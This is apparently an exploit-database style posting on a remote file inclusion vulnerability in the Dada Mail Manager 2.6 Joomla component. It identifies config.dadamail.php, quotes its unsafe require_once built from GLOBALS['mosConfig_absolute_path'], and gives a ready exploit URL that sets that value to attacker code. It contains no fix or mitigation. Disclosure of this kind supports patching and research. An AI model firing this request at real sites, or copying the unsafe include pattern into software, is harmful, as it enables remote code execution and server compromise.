Dada Mail Manager 2.6 - RFI


[o] Dada Mail Manager Joomla Component 2.6 Remote File Inclusion Vulnerability
Software : com_dadamail version 2.6
Vendor : http://joomlander.net
Download : http://joomlacode.org/gf/project/dadamailmanager/frs
Author : NoGe


[o] Vulnerable file
administrator/components/com_dadamail/config.dadamail.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');


[o] Exploit
http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=[evilcode]